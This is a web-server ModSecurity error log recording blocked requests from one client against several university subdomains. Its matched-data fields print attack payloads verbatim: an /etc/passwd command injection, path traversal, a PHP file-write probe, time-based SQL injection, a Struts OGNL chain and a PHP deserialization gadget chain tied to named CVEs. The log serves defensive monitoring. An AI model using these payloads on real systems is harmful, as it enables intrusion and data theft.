[Tue Aug 29 11:34:57.376676 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11ccCo-f0AAAUB02QAAAA5"]
[Tue Aug 29 11:34:58.303651 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAAVJXkMAAAAA"]
[Tue Aug 29 11:34:58.308678 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAASHh9IAAAAD"]
[Tue Aug 29 11:34:58.309751 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAATQXh4AAAAO"]
[Tue Aug 29 11:34:58.323516 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAATzVI8AAAAx"]
[Tue Aug 29 11:34:58.329757 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11csCo-f0AAAUKhAgAAABC"]
[Tue Aug 29 11:34:58.336282 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11csCo-f0AAAUJIy4AAABB"]
[Tue Aug 29 11:34:58.357932 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x22<? found within ARGS:content: <?php file_put_contents(\\x222Udxlb4qUcCcHIzUrBC9eAPkNPN.php\\x22,\\x22<?php echo phpinfo();\\x22);"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11csCo-f0AAAUUZ8oAAABK"]
[Tue Aug 29 11:34:58.362558 2023] [:error] [pid 1242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:table_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:table_id: ' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/dashboard/view-chair-list.php"] [unique_id "ZO11csCo-f0AAATavvIAAAAg"]
[Tue Aug 29 11:34:58.369544 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11csCo-f0AAAPLwKIAAAAX"]
[Tue Aug 29 11:34:58.381322 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pid: 0 echo start cat/etc/passwd echo end "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/linuxki/experimental/vis/kivis.php"] [unique_id "ZO11csCo-f0AAAShCaAAAAAi"]
[Tue Aug 29 11:34:59.307727 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAAUJIy8AAABB"]
[Tue Aug 29 11:34:59.321856 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAATfd4MAAAAk"]
[Tue Aug 29 11:34:59.322502 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAATWYR4AAAAa"]
[Tue Aug 29 11:34:59.337199 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAASOUpwAAAAR"]
[Tue Aug 29 11:34:59.380469 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{}} found within ARGS:cmd: {\\x22/expandocolumn/add-column\\x22:{}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/jsonws/invoke"] [unique_id "ZO11c8Co-f0AAASHh9QAAAAD"]
[Tue Aug 29 11:34:59.386682 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11c8Co-f0AAARdiTEAAAAK"]
[Tue Aug 29 11:35:00.534205 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:lang: ../../thinkphp/base"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11dMCo-f0AAAUKhAoAAABC"]
[Tue Aug 29 11:35:01.301192 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAAUJIzEAAABB"]
[Tue Aug 29 11:35:01.303488 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAAUOaUoAAABG"]
[Tue Aug 29 11:35:01.337113 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAATxvY8AAAAw"]
[Tue Aug 29 11:35:01.343750 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../vendor/topthink/think-trace/src/TraceDebug"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAATUxRoAAAAW"]
[Tue Aug 29 11:35:01.364149 2023] [:error] [pid 1309] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAAUdm4YAAABS"]
[Tue Aug 29 11:35:01.370196 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11dcCo-f0AAATSkoAAAAAT"]
[Tue Aug 29 11:35:02.305563 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAAVK0HcAAAAB"]
[Tue Aug 29 11:35:02.324215 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAARdiTQAAAAK"]
[Tue Aug 29 11:35:02.328845 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %{(# found within ARGS:id: %{(#instancemanager=#application[\\x22org.apache.tomcat.InstanceManager\\x22]).(#stack=#attr[\\x22com.opensymphony.xwork2.util.ValueStack.ValueStack\\x22]).(#bean=#instancemanager.newInstance(\\x22org.apache.commons.collections.BeanMap\\x22)).(#bean.setBean(#stack)).(#context=#bean.get(\\x22context\\x22)).(#bean.setBean(#context)).(#macc=#bean.get(\\x22memberAccess\\x22)).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\\x22java.util.HashSet\\x22)).(#bean.put(\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11dsCo-f0AAAUNalUAAABF"]
[Tue Aug 29 11:35:02.346709 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAATxvZAAAAAw"]
[Tue Aug 29 11:35:02.350018 2023] [:error] [pid 1360] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAAVQYx4AAAAI"]
[Tue Aug 29 11:35:02.350254 2023] [:error] [pid 1281] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:blowf. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:blowf: system('echo CVE-2022-1609 | rev');"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-json/am-member/license"] [unique_id "ZO11dsCo-f0AAAUB02cAAAA5"]
[Tue Aug 29 11:35:02.352792 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAARdiTUAAAAK"]
[Tue Aug 29 11:35:02.354051 2023] [:error] [pid 1296] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:user[searchprefs]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :\\x22\\x00*\\x00 found within ARGS:user[searchprefs]: a:2:{i:0;O:27:\\x22googlelogin_vendor_autoload\\x22:0:{}i:1;O:32:\\x22Monolog\\x5cHandler\\x5cSyslogUdpHandler\\x22:1:{s:9:\\x22\\x00*\\x00socket\\x22;O:29:\\x22Monolog\\x5cHandler\\x5cBufferHandler\\x22:7:{s:10:\\x22\\x00*\\x00handler\\x22;r:4;s:13:\\x22\\x00*\\x00bufferSize\\x22;i:-1;s:9:\\x22\\x00*\\x00buffer\\x22;a:1:{i:0;a:2:{i:0;s:14:\\x22CVE-2023-25135\\x22;s:5:\\x22level\\x22;N;}}s:8:\\x22\\x00*\\x00level\\x22;N;s:14:\\x22\\x00*\\x00initialized\\x22;b:1;s:14:\\x22\\x00*\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ajax/api/user/save"] [unique_id "ZO11dsCo-f0AAAUQ7scAAABH"]
